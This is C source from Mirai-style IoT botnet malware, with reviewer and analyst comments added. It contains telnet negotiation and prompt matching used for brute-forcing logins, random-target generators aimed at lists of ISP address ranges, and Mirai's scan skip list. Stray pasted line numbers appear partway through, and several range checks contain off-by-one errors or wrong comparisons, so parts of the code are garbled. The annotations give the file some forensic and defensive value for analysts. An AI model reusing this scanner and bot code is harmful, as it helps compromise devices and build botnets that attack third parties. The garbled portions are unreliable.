 * Reads one newline-terminated line into buf (at most bufsize-1 bytes plus a
 * NUL terminator).
 * It first waits up to 30 seconds in select() for activity and retries the
 * wait on timeout or error, then reads byte by byte until '\n'.
 * Returns the number of bytes before the newline, or -1 if a recv() does not
 * deliver exactly one byte.
 *
 * The select() calls wait on the socket argument, while the bytes are read
 * from the global mainCommSock.
 * NOTE(review): retryCount has no initializer, so the number of retries is
 * indeterminate.
 */
int recvLine(int socket, unsigned char *buf, int bufsize) {
    memset(buf, 0, bufsize);
    fd_set myset;
    struct timeval tv;
    tv.tv_sec = 30;
    tv.tv_usec = 0;
    FD_ZERO(&myset);
    FD_SET(socket, &myset);
    int selectRtn, retryCount;
    /* the same set is passed for both readability and exceptional conditions */
    if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
        while(retryCount < 10) {
            tv.tv_sec = 30;
            tv.tv_usec = 0;
            FD_ZERO(&myset);
            FD_SET(socket, &myset);
            if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
                retryCount++;
                continue;
            }
            break;
        }
    }
    unsigned char tmpchr;
    unsigned char *cp;
    int count = 0;
    cp = buf;
    while(bufsize-- > 1) {      /* leave room for the terminator */
        if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
            *cp = 0x00;
            return -1;
        }
        *cp++ = tmpchr;
        if(tmpchr == '\n') break;
        count++;
    }
    *cp = 0x00;
    return count;
}
/*
 * Connects fd to host:port, giving up after timeout seconds.
 * host must be a numeric IPv4 address (see getHost()).
 * The socket is switched to non-blocking mode, connect() is started, and
 * select() waits for writability; SO_ERROR then tells whether the connection
 * was established. On success the socket is put back into blocking mode.
 * Returns 1 on success and 0 on any failure; on the failure paths the socket
 * is left non-blocking.
 * The return values of fcntl() and getsockopt() are not checked.
 */
int connectTimeout(int fd, char *host, int port, int timeout) {
    struct sockaddr_in dest_addr;
    fd_set myset;
    struct timeval tv;
    socklen_t lon;
    int valopt;
    long arg = fcntl(fd, F_GETFL, NULL);
    arg |= O_NONBLOCK;
    fcntl(fd, F_SETFL, arg);
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(port);
    if(getHost(host, &dest_addr.sin_addr)) return 0;
    memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
    int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
    if (res < 0) {
        if (errno == EINPROGRESS) {
            tv.tv_sec = timeout;
            tv.tv_usec = 0;
            FD_ZERO(&myset);
            FD_SET(fd, &myset);
            if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
                lon = sizeof(int);
                /* a pending socket error means the connect attempt failed */
                getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
                if (valopt) return 0;
            }
            else return 0;
        }
        else return 0;
    }
    arg = fcntl(fd, F_GETFL, NULL);
    arg &= (~O_NONBLOCK);
    fcntl(fd, F_SETFL, arg);
    return 1;
}
/*
 * fork() wrapper that records each child's pid in the global pids[] array
 * (length numpids) by allocating a larger array, copying the old entries and
 * freeing the old array.
 * Returns 0 in the child and the child's pid in the parent.
 *
 * The fork() result is stored in a uint32_t, so the "<= 0" test is true only
 * for 0; a failed fork() (-1) is not distinguished from a pid.
 * Forensics: the bot runs as several processes, so stopping one pid does not
 * stop the others.
 * NOTE(review): the malloc() result is not checked.
 */
int listFork() {
    uint32_t parent, *newpids, i;
    parent = fork();
    if (parent <= 0) return parent;
    numpids++;
    newpids = (uint32_t*)malloc((numpids + 1) * 4);
    for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
    newpids[numpids - 1] = parent;
    free(pids);
    pids = newpids;
    return parent;
}
/*
 * Answers one three-byte telnet option negotiation (IAC, verb, option) held
 * in buf[0..2] by sending back IAC, a reply verb and the same option byte,
 * each with its own one-byte send().
 * For the verbs handled here the reply verb always declines: WONT is answered
 * with DONT, DONT with WONT, DO with WONT and WILL with DONT.
 * len is unused and the function always returns 0.
 *
 * A telnet client that refuses every option it is offered is a behavioural
 * trait that honeypots and network sensors can record alongside the login
 * attempts.
 */
int negotiate(int sock, unsigned char *buf, int len) {
    unsigned char c;
    switch (buf[1]) {
    case CMD_IAC: return 0;
    case CMD_WILL:
    case CMD_WONT:
    case CMD_DO:
    case CMD_DONT:
        c = CMD_IAC;
        send(sock, &c, 1, MSG_NOSIGNAL);
        if (CMD_WONT == buf[1]) c = CMD_DONT;
        else if (CMD_DONT == buf[1]) c = CMD_WONT;
        else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
        else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
        send(sock, &c, 1, MSG_NOSIGNAL);
        send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
        break;
    default:
        break;
    }
    return 0;
}
/*
 * Returns 1 if the last significant character of bufStr is one of the prompt
 * characters ':', '>', '%', '$' or '#', otherwise 0.
 * q is the distance stepped back from the end of the string over NUL, space,
 * CR and LF; it starts at 0, which is the terminator itself, and is kept
 * across iterations of the outer loop.
 */
int matchPrompt(char *bufStr) {
    char *prompts = ":>%$#\0";
    int bufLen = strlen(bufStr);
    int i, q = 0;
    for(i = 0; i < strlen(prompts); i++) {
        while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
        if(*(bufStr + bufLen - q) == prompts[i]) return 1;
    }
    return 0;
}
/* Scratch octets shared by the address generators below. */
uint8_t ipState[5] = {0};
/*
 * Produces a random IPv4 address for the scanner and returns it in network
 * byte order (the inet_addr() result).
 * Octets are drawn with rand(): the first from 0..222, the others from
 * 0..254. The draw is repeated while the address matches any clause of the
 * exclusion condition, which covers 0/8, 10/8, 100.64/10, loopback,
 * link-local, 192.168/16, the documentation networks and everything from 224
 * upward, among others.
 *
 * Seen from the network, a host running this produces connection attempts to
 * a large number of unrelated public addresses in a short time, which
 * flow-based monitoring can flag regardless of payload.
 */
in_addr_t getRandomPublicIP() {
    ipState[0] = rand() % 223;
    ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;
    ipState[3] = rand() % 255;
    while(
    (ipState[0] == 0) ||
    (ipState[0] == 10) ||
    (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
    (ipState[0] == 127) ||
    (ipState[0] == 169 && ipState[1] == 254) ||
    (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
    (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
    (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
    (ipState[0] == 192 && ipState[1] == 168) ||
    (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
    (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
    (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
    (ipState[0] >= 224)
    )
    {
        ipState[0] = rand() % 223;
        ipState[1] = rand() % 255;
        ipState[2] = rand() % 255;
        ipState[3] = rand() % 255;
    }
    char ip[16] = {0};
    szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
    return inet_addr(ip);
}
/*
 * Produces one IPv4 address for the scanner from a fixed list of /16
 * prefixes and returns it in network byte order (the inet_addr() result).
 * randnum selects the prefix; ipState[2] and ipState[3] supply the last two
 * octets. ipState[0] and ipState[1] are randomised as well but do not appear
 * in the result.
 *
 * Unlike getRandomPublicIP(), the first two octets are never random, so
 * traffic from this routine is concentrated on the listed networks. The
 * operators of those ranges would see it as repeated connection attempts
 * spread across a /16; the destination port is not visible in this part of
 * the file.
 */
in_addr_t BCMSCAN()
{
    ipState[0] = 0;
    ipState[1] = 0;
    ipState[2] = 0;
    ipState[3] = 0;
    ipState[0] = rand() % 255;
    ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;
    ipState[3] = rand() % 255;
    int randnum = rand() % 37;
    char ip[16];
    if(randnum == 0)
    {
        szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 1)
    {
        szprintf(ip, "146.158.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 2)
    {
        szprintf(ip, "185.4.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 3)
    {
        szprintf(ip, "188.76.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 4)
    {
        szprintf(ip, "188.77.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 5)
    {
        szprintf(ip, "188.78.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 6)
    {
        szprintf(ip, "188.79.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 7)
    {
        szprintf(ip, "212.106.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 8)
    {
        szprintf(ip, "212.9.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 9)
    {
        szprintf(ip, "213.179.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 10)
    {
        szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 11)
    {
        szprintf(ip, "37.132.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 12)
    {
        szprintf(ip, "37.133.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 13)
    {
        szprintf(ip, "37.134.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 14)
    {
        szprintf(ip, "37.135.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 15)
    {
        szprintf(ip, "37.14.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 16)
    {
        szprintf(ip, "37.15.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 17)
    {
        szprintf(ip, "37.35.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 18)
    {
        szprintf(ip, "37.97.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 19)
    {
        szprintf(ip, "62.14.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 20)
    {
        szprintf(ip, "87.216.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 21)
    {
        szprintf(ip, "87.217.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 22)
    {
        szprintf(ip, "87.218.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 23)
    {
        szprintf(ip, "87.219.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 24)
    {
        szprintf(ip, "87.220.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 25)
    {
        szprintf(ip, "87.221.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 26)
    {
        szprintf(ip, "87.222.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 27)
    {
        szprintf(ip, "87.223.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 28)
    {
        szprintf(ip, "90.94.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 29)
    {
        szprintf(ip, "92.191.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 30)
    {
        szprintf(ip, "95.16.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 31)
    {
        szprintf(ip, "95.17.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 32)
    {
        szprintf(ip, "95.18.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 33)
    {
        szprintf(ip, "95.19.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 34)
    {
        szprintf(ip, "95.20.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 35)
    {
        szprintf(ip, "95.21.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 36)
    {
        szprintf(ip, "95.22.%d.%d", ipState[2], ipState[3]);
    }
    if(randnum == 37)
    {
        szprintf(ip, "95.23.%d.%d", ipState[2], ipState[3]);
    }
    return inet_addr(ip);
}
  932. in_addr_t PhoneScan(){
  933. ipState[0] = 0;
  934. ipState[1] = 0;
  935. ipState[2] = 0;
  936. ipState[3] = 0;
  937. ipState[0] = rand() % 255;
  938. ipState[1] = rand() % 255;
  939. ipState[2] = rand() % 255;
  940. ipState[3] = rand() % 255;
  941. int randnum = rand() % 117;
  942. char ip[16];
  943. if(randnum == 0)
  944. {
  945. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
  946. }
  947. if(randnum == 1)
  948. {
  949. szprintf(ip, "119.150.%d.%d", ipState[2], ipState[3]);
  950. }
  951. if(randnum == 2)
  952. {
  953. szprintf(ip, "119.151.%d.%d", ipState[2], ipState[3]);
  954. }
  955. if(randnum == 3)
  956. {
  957. szprintf(ip, "119.152.%d.%d", ipState[2], ipState[3]);
  958. }
  959. if(randnum == 4)
  960. {
  961. szprintf(ip, "119.153.%d.%d", ipState[2], ipState[3]);
  962. }
  963. if(randnum == 5)
  964. {
  965. szprintf(ip, "119.154.%d.%d", ipState[2], ipState[3]);
  966. }
  967. if(randnum == 6)
  968. {
  969. szprintf(ip, "119.155.%d.%d", ipState[2], ipState[3]);
  970. }
  971. if(randnum == 7)
  972. {
  973. szprintf(ip, "119.156.%d.%d", ipState[2], ipState[3]);
  974. }
  975. if(randnum == 8)
  976. {
  977. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
  978. }
  979. if(randnum == 9)
  980. {
  981. szprintf(ip, "119.158.%d.%d", ipState[2], ipState[3]);
  982. }
  983. if(randnum == 10)
  984. {
  985. szprintf(ip, "119.159.%d.%d", ipState[2], ipState[3]);
  986. }
  987. if(randnum == 11)
  988. {
  989. szprintf(ip, "191.24.%d.%d", ipState[2], ipState[3]);
  990. }
  991. if(randnum == 12)
  992. {
  993. szprintf(ip, "187.119.%d.%d", ipState[2], ipState[3]);
  994. }
  995. if(randnum == 13)
  996. {
  997. szprintf(ip, "177.215.%d.%d", ipState[2], ipState[3]);
  998. }
  999. if(randnum == 14)
  1000. {
  1001. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
  1002. }
  1003. if(randnum == 15)
  1004. {
  1005. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
  1006. }
  1007. if(randnum == 16)
  1008. {
  1009. szprintf(ip, "179.80.%d.%d", ipState[2], ipState[3]);
  1010. }
  1011. if(randnum == 17)
  1012. {
  1013. szprintf(ip, "179.81.%d.%d", ipState[2], ipState[3]);
  1014. }
  1015. if(randnum == 18)
  1016. {
  1017. szprintf(ip, "179.82.%d.%d", ipState[2], ipState[3]);
  1018. }
  1019. if(randnum == 19)
  1020. {
  1021. szprintf(ip, "179.83.%d.%d", ipState[2], ipState[3]);
  1022. }
  1023. if(randnum == 20)
  1024. {
  1025. szprintf(ip, "179.84.%d.%d", ipState[2], ipState[3]);
  1026. }
  1027. if(randnum == 21)
  1028. {
  1029. szprintf(ip, "179.86.%d.%d", ipState[2], ipState[3]);
  1030. }
  1031. if(randnum == 22)
  1032. {
  1033. szprintf(ip, "179.87.%d.%d", ipState[2], ipState[3]);
  1034. }
  1035. if(randnum == 23)
  1036. {
  1037. szprintf(ip, "179.88.%d.%d", ipState[2], ipState[3]);
  1038. }
  1039. if(randnum == 24)
  1040. {
  1041. szprintf(ip, "179.89.%d.%d", ipState[2], ipState[3]);
  1042. }
  1043. if(randnum == 25)
  1044. {
  1045. szprintf(ip, "179.90.%d.%d", ipState[2], ipState[3]);
  1046. }
  1047. if(randnum == 26)
  1048. {
  1049. szprintf(ip, "179.91.%d.%d", ipState[2], ipState[3]);
  1050. }
  1051. if(randnum == 27)
  1052. {
  1053. szprintf(ip, "179.92.%d.%d", ipState[2], ipState[3]);
  1054. }
  1055. if(randnum == 28)
  1056. {
  1057. szprintf(ip, "179.93.%d.%d", ipState[2], ipState[3]);
  1058. }
  1059. if(randnum == 29)
  1060. {
  1061. szprintf(ip, "179.94.%d.%d", ipState[2], ipState[3]);
  1062. }
  1063. if(randnum == 30)
  1064. {
  1065. szprintf(ip, "179.95.%d.%d", ipState[2], ipState[3]);
  1066. }
  1067. if(randnum == 31)
  1068. {
  1069. szprintf(ip, "179.96.%d.%d", ipState[2], ipState[3]);
  1070. }
  1071. if(randnum == 32)
  1072. {
  1073. szprintf(ip, "179.97.%d.%d", ipState[2], ipState[3]);
  1074. }
  1075. if(randnum == 33)
  1076. {
  1077. szprintf(ip, "179.98.%d.%d", ipState[2], ipState[3]);
  1078. }
  1079. if(randnum == 34)
  1080. {
  1081. szprintf(ip, "179.99.%d.%d", ipState[2], ipState[3]);
  1082. }
  1083. if(randnum == 35)
  1084. {
  1085. szprintf(ip, "152.240.%d.%d", ipState[2], ipState[3]);
  1086. }
  1087. if(randnum == 36)
  1088. {
  1089. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
  1090. }
  1091. if(randnum == 37)
  1092. {
  1093. szprintf(ip, "152.242.%d.%d", ipState[2], ipState[3]);
  1094. }
  1095. if(randnum == 38)
  1096. {
  1097. szprintf(ip, "152.243.%d.%d", ipState[2], ipState[3]);
  1098. }
  1099. if(randnum == 39)
  1100. {
  1101. szprintf(ip, "152.244.%d.%d", ipState[2], ipState[3]);
  1102. }
  1103. if(randnum == 40)
  1104. {
  1105. szprintf(ip, "152.245.%d.%d", ipState[2], ipState[3]);
  1106. }
  1107. if(randnum == 41)
  1108. {
  1109. szprintf(ip, "152.246.%d.%d", ipState[2], ipState[3]);
  1110. }
  1111. if(randnum == 42)
  1112. {
  1113. szprintf(ip, "152.247.%d.%d", ipState[2], ipState[3]);
  1114. }
  1115. if(randnum == 43)
  1116. {
  1117. szprintf(ip, "152.248.%d.%d", ipState[2], ipState[3]);
  1118. }
  1119. if(randnum == 44)
  1120. {
  1121. szprintf(ip, "152.249.%d.%d", ipState[2], ipState[3]);
  1122. }
  1123. if(randnum == 45)
  1124. {
  1125. szprintf(ip, "182.189.%d.%d", ipState[2], ipState[3]);
  1126. }
  1127. if(randnum == 46)
  1128. {
  1129. szprintf(ip, "182.190.%d.%d", ipState[2], ipState[3]);
  1130. }
  1131. if(randnum == 47)
  1132. {
  1133. szprintf(ip, "182.191.%d.%d", ipState[2], ipState[3]);
  1134. }
  1135. if(randnum == 48)
  1136. {
  1137. szprintf(ip, "182.188.%d.%d", ipState[2], ipState[3]);
  1138. }
  1139. if(randnum == 49)
  1140. {
  1141. szprintf(ip, "182.187.%d.%d", ipState[2], ipState[3]);
  1142. }
  1143. if(randnum == 50)
  1144. {
  1145. szprintf(ip, "182.186.%d.%d", ipState[2], ipState[3]);
  1146. }
  1147. if(randnum == 51)
  1148. {
  1149. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
  1150. }
  1151. if(randnum == 52)
  1152. {
  1153. szprintf(ip, "182.184.%d.%d", ipState[2], ipState[3]);
  1154. }
  1155. if(randnum == 53)
  1156. {
  1157. szprintf(ip, "179.100.%d.%d", ipState[2], ipState[3]);
  1158. }
  1159. if(randnum == 54)
  1160. {
  1161. szprintf(ip, "179.101.%d.%d", ipState[2], ipState[3]);
  1162. }
  1163. if(randnum == 55)
  1164. {
  1165. szprintf(ip, "179.102.%d.%d", ipState[2], ipState[3]);
  1166. }
  1167. if(randnum == 56)
  1168. {
  1169. szprintf(ip, "179.103.%d.%d", ipState[2], ipState[3]);
  1170. }
  1171. if(randnum == 57)
  1172. {
  1173. szprintf(ip, "179.110.%d.%d", ipState[2], ipState[3]);
  1174. }
  1175. if(randnum == 58)
  1176. {
  1177. szprintf(ip, "179.111.%d.%d", ipState[2], ipState[3]);
  1178. }
  1179. if(randnum == 59)
  1180. {
  1181. szprintf(ip, "179.112.%d.%d", ipState[2], ipState[3]);
  1182. }
  1183. if(randnum == 60)
  1184. {
  1185. szprintf(ip, "179.113.%d.%d", ipState[2], ipState[3]);
  1186. }
  1187. if(randnum == 61)
  1188. {
  1189. szprintf(ip, "179.114.%d.%d", ipState[2], ipState[3]);
  1190. }
  1191. if(randnum == 62)
  1192. {
  1193. szprintf(ip, "179.115.%d.%d", ipState[2], ipState[3]);
  1194. }
  1195. if(randnum == 63)
  1196. {
  1197. szprintf(ip, "179.116.%d.%d", ipState[2], ipState[3]);
  1198. }
  1199. if(randnum == 64)
  1200. {
  1201. szprintf(ip, "179.117.%d.%d", ipState[2], ipState[3]);
  1202. }
  1203. if(randnum == 65)
  1204. {
  1205. szprintf(ip, "191.193.%d.%d", ipState[2], ipState[3]);
  1206. }
  1207. if(randnum == 66)
  1208. {
  1209. szprintf(ip, "191.194.%d.%d", ipState[2], ipState[3]);
  1210. }
  1211. if(randnum == 67)
  1212. {
  1213. szprintf(ip, "191.195.%d.%d", ipState[2], ipState[3]);
  1214. }
  1215. if(randnum == 68)
  1216. {
  1217. szprintf(ip, "191.196.%d.%d", ipState[2], ipState[3]);
  1218. }
  1219. if(randnum == 69)
  1220. {
  1221. szprintf(ip, "191.197.%d.%d", ipState[2], ipState[3]);
  1222. }
  1223. if(randnum == 70)
  1224. {
  1225. szprintf(ip, "191.198.%d.%d", ipState[2], ipState[3]);
  1226. }
  1227. if(randnum == 71)
  1228. {
  1229. szprintf(ip, "152.250.%d.%d", ipState[2], ipState[3]);
  1230. }
  1231. if(randnum == 72)
  1232. {
  1233. szprintf(ip, "152.251.%d.%d", ipState[2], ipState[3]);
  1234. }
  1235. if(randnum == 73)
  1236. {
  1237. szprintf(ip, "152.252.%d.%d", ipState[2], ipState[3]);
  1238. }
  1239. if(randnum == 74)
  1240. {
  1241. szprintf(ip, "152.253.%d.%d", ipState[2], ipState[3]);
  1242. }
  1243. if(randnum == 75)
  1244. {
  1245. szprintf(ip, "152.254.%d.%d", ipState[2], ipState[3]);
  1246. }
  1247. if(randnum == 76)
  1248. {
  1249. szprintf(ip, "152.255.%d.%d", ipState[2], ipState[3]);
  1250. }
  1251. if(randnum == 77)
  1252. {
  1253. szprintf(ip, "177.112.%d.%d", ipState[2], ipState[3]);
  1254. }
  1255. if(randnum == 78)
  1256. {
  1257. szprintf(ip, "177.113.%d.%d", ipState[2], ipState[3]);
  1258. }
  1259. if(randnum == 79)
  1260. {
  1261. szprintf(ip, "177.114.%d.%d", ipState[2], ipState[3]);
  1262. }
  1263. if(randnum == 80)
  1264. {
  1265. szprintf(ip, "177.115.%d.%d", ipState[2], ipState[3]);
  1266. }
  1267. if(randnum == 81)
  1268. {
  1269. szprintf(ip, "177.116.%d.%d", ipState[2], ipState[3]);
  1270. }
  1271. if(randnum == 82)
  1272. {
  1273. szprintf(ip, "177.117.%d.%d", ipState[2], ipState[3]);
  1274. }
  1275. if(randnum == 83)
  1276. {
  1277. szprintf(ip, "177.118.%d.%d", ipState[2], ipState[3]);
  1278. }
  1279. if(randnum == 84)
  1280. {
  1281. szprintf(ip, "177.119.%d.%d", ipState[2], ipState[3]);
  1282. }
  1283. if(randnum == 85)
  1284. {
  1285. szprintf(ip, "177.120.%d.%d", ipState[2], ipState[3]);
  1286. }
  1287. if(randnum == 86)
  1288. {
  1289. szprintf(ip, "177.121.%d.%d", ipState[2], ipState[3]);
  1290. }
  1291. if(randnum == 87)
  1292. {
  1293. szprintf(ip, "177.138.%d.%d", ipState[2], ipState[3]);
  1294. }
  1295. if(randnum == 88)
  1296. {
  1297. szprintf(ip, "177.139.%d.%d", ipState[2], ipState[3]);
  1298. }
  1299. if(randnum == 89)
  1300. {
  1301. szprintf(ip, "177.144.%d.%d", ipState[2], ipState[3]);
  1302. }
  1303. if(randnum == 90)
  1304. {
  1305. szprintf(ip, "177.145.%d.%d", ipState[2], ipState[3]);
  1306. }
  1307. if(randnum == 91)
  1308. {
  1309. szprintf(ip, "177.146.%d.%d", ipState[2], ipState[3]);
  1310. }
  1311. if(randnum == 92)
  1312. {
  1313. szprintf(ip, "177.147.%d.%d", ipState[2], ipState[3]);
  1314. }
  1315. if(randnum == 93)
  1316. {
  1317. szprintf(ip, "177.160.%d.%d", ipState[2], ipState[3]);
  1318. }
  1319. if(randnum == 94)
  1320. {
  1321. szprintf(ip, "177.161.%d.%d", ipState[2], ipState[3]);
  1322. }
  1323. if(randnum == 95)
  1324. {
  1325. szprintf(ip, "177.162.%d.%d", ipState[2], ipState[3]);
  1326. }
  1327. if(randnum == 96)
  1328. {
  1329. szprintf(ip, "177.163.%d.%d", ipState[2], ipState[3]);
  1330. }
  1331. if(randnum == 97)
  1332. {
  1333. szprintf(ip, "177.168.%d.%d", ipState[2], ipState[3]);
  1334. }
  1335. if(randnum == 98)
  1336. {
  1337. szprintf(ip, "177.169.%d.%d", ipState[2], ipState[3]);
  1338. }
  1339. if(randnum == 99)
  1340. {
  1341. szprintf(ip, "177.170.%d.%d", ipState[2], ipState[3]);
  1342. }
  1343. if(randnum == 100)
  1344. {
  1345. szprintf(ip, "177.171.%d.%d", ipState[2], ipState[3]);
  1346. }
  1347. if(randnum == 101)
  1348. {
  1349. szprintf(ip, "177.172.%d.%d", ipState[2], ipState[3]);
  1350. }
  1351. if(randnum == 102)
  1352. {
  1353. szprintf(ip, "189.96.%d.%d", ipState[2], ipState[3]);
  1354. }
  1355. if(randnum == 103)
  1356. {
  1357. szprintf(ip, "189.97.%d.%d", ipState[2], ipState[3]);
  1358. }
  1359. if(randnum == 104)
  1360. {
  1361. szprintf(ip, "189.98.%d.%d", ipState[2], ipState[3]);
  1362. }
  1363. if(randnum == 105)
  1364. {
  1365. szprintf(ip, "189.99.%d.%d", ipState[2], ipState[3]);
  1366. }
  1367. if(randnum == 106)
  1368. {
  1369. szprintf(ip, "39.34.%d.%d", ipState[2], ipState[3]);
  1370. }
  1371. if(randnum == 107)
  1372. {
  1373. szprintf(ip, "59.103.%d.%d", ipState[2], ipState[3]);
  1374. }
  1375. if(randnum == 108)
  1376. {
  1377. szprintf(ip, "191.12.%d.%d", ipState[2], ipState[3]);
  1378. }
  1379. if(randnum == 109)
  1380. {
  1381. szprintf(ip, "186.117.%d.%d", ipState[2], ipState[3]);
  1382. }
  1383. if(randnum == 110)
  1384. {
  1385. szprintf(ip, "179.131.%d.%d", ipState[2], ipState[3]);
  1386. }
  1387. if(randnum == 111)
  1388. {
  1389. szprintf(ip, "179.129.%d.%d", ipState[2], ipState[3]);
  1390. }
  1391. if(randnum == 112)
  1392. {
  1393. szprintf(ip, "179.170.%d.%d", ipState[2], ipState[3]);
  1394. }
  1395. if(randnum == 113)
  1396. {
  1397. szprintf(ip, "191.206.%d.%d", ipState[2], ipState[3]);
  1398. }
  1399. if(randnum == 114)
  1400. {
  1401. szprintf(ip, "187.118.%d.%d", ipState[2], ipState[3]);
  1402. }
  1403. if(randnum == 115)
  1404. {
  1405. szprintf(ip, "187.116.%d.%d", ipState[2], ipState[3]);
  1406. }
  1407. if(randnum == 116)
  1408. {
  1409. szprintf(ip, "179.224.%d.%d", ipState[2], ipState[3]);
  1410. }
  1411. if(randnum == 117)
  1412. {
  1413. szprintf(ip, "179.166.%d.%d", ipState[2], ipState[3]);
  1414. }
  1415. return inet_addr(ip);
  1416. }
  /*
   * MiraiIPRanges - pick a pseudo-random IPv4 address outside a fixed skip list.
   *
   * Draws 32 bits from rand_cmwc() (defined outside this view), splits them
   * into four octets, and redraws for as long as the first one or two octets
   * match an entry of the skip list in the while() condition. The accepted
   * octets are packed with INET_ADDR(), which applies htonl() with o1 as the
   * most significant byte, so the return value is in network byte order with
   * o1 as the leading octet.
   *
   * In the visible part of this file the only caller is MiraiScanner, which
   * stores the result as the address of its next TCP/23 connection.
   *
   * Analyst note: the skip list shows which networks this routine never
   * selects; any other address can be drawn. The organisation names are the
   * original author's labels. Where a label and the actual test disagree, the
   * comment below describes what the test matches.
   */
  static ipv4_t MiraiIPRanges(void)
  {
      uint32_t tmp;
      uint8_t o1, o2, o3, o4;
      do
      {
          tmp = rand_cmwc();
          o1 = tmp & 0xff;
          o2 = (tmp >> 8) & 0xff;
          o3 = (tmp >> 16) & 0xff;
          o4 = (tmp >> 24) & 0xff;
      }
      while (o1 == 127 || // 127.0.0.0/8 - loopback
          (o1 == 0) || // 0.0.0.0/8 - invalid address space
          (o1 == 3) || // 3.0.0.0/8 - author's label: General Electric Company
          (o1 == 15 || o1 == 16) || // 15.0.0.0/8 and 16.0.0.0/8 - author's label: Hewlett-Packard Company
          (o1 == 56) || // 56.0.0.0/8 - author's label: US Postal Service
          (o1 == 10) || // 10.0.0.0/8 - private network
          (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - private network
          (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.x.x-172.31.x.x, i.e. 172.16.0.0/12 (author's label said /14)
          (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.x.x-100.126.x.x (author's label: 100.64.0.0/10; 100.127.x.x is not matched)
          (o1 == 169 && o2 > 254) || // matches 169.255.x.x only (author's label: 169.254.0.0/16)
          (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA special use
          (o1 >= 224) || // 224.0.0.0 and above - multicast and reserved space
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // author's label: Department of Defense
      );
      /* The dotted-quad text is formatted here but not used by the return value. */
      char ip[16];
      szprintf(ip, "%d.%d.%d.%d", o1, o2, o3, o4);
      return INET_ADDR(o1,o2,o3,o4);
  }
  /* Range selector read by findARandomIP(). Every branch of that function
     returns getRandomPublicIP(), so in the code visible here this value does
     not change which generator is used. */
  int rangechoice = 1;
  /*
   * findARandomIP - return the next address for TelnetScanner to connect to.
   *
   * Branches on the global rangechoice, but every branch calls
   * getRandomPublicIP() (defined outside this view), so the selector has no
   * effect on the result in the code shown here. The final else is
   * unreachable: the outer test has already limited rangechoice to 1 or 2.
   *
